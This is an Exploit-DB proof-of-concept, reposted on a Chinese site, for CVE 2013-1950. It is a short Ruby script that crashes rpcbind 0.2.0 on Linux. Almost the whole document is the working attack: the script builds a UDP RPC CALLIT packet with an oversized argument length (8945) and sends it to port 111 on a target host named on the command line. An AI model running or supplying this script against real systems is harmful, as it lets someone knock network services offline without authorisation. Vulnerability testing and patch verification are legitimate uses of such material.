rpcbind – CALLIT procedure UDP Crash (PoC) - 体验盒子

作者： Sean Verity

日期： 2013-07-16

类别：

dos

平台：

linux

来源：https://www.exploit-db.com/exploits/26887/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

#!/usr/bin/ruby

#

# rpcbind_udp_crash_poc.rb

# 07/15/2013

# Sean Verity <veritysr1980 [at] gmail.com>

# CVE 2013-1950

#

# rpcbind (CALLIT Procedure) UDP Crash PoC

# Affected Software Package: rpcbind-0.2.0-19

#

# Tested on:

# Fedora 17 (3.9.8-100.fc17.x86_64 #1 SMP)

# CentOS 6.3 Final (2.6.32-279.22.1.el6.x86_64 #1 SMP)

#

# rpcbind can be crashed by setting the argument length

# value > 8944 in an RPC CALLIT procedure request over UDP.

#

require 'socket'

def usage

abort "\nusage: ./rpcbind_udp_crash_poc.rb <target>\n\n"

end

if ARGV.length == 1

pkt = [rand(2**32)].pack('N') # XID

pkt << [0].pack('N') # Message Type: CALL (0)

pkt << [2].pack('N') # RPC Version: 2

pkt << [100000].pack('N') # Program: Portmap (100000)

pkt << [2].pack('N') # Program Version: 2

pkt << [5].pack('N') # Procedure: CALLIT (5)

pkt << [0].pack('N') # Credentials Flavor: AUTH_NULL (0)

pkt << [0].pack('N') # Length: 0

pkt << [0].pack('N') # Credentials Verifier: AUTH_NULL (0)

pkt << [0].pack('N') # Length: 0

pkt << [0].pack('N') # Program: Unknown (0)

pkt << [1].pack('N') # Version: 1

pkt << [1].pack('N') # Procedure: 1

pkt << [8945].pack('N') # Argument Length

pkt << "crash" # Arguments

s = UDPSocket.new

s.send(pkt, 0, ARGV[0], 111)

else

usage

end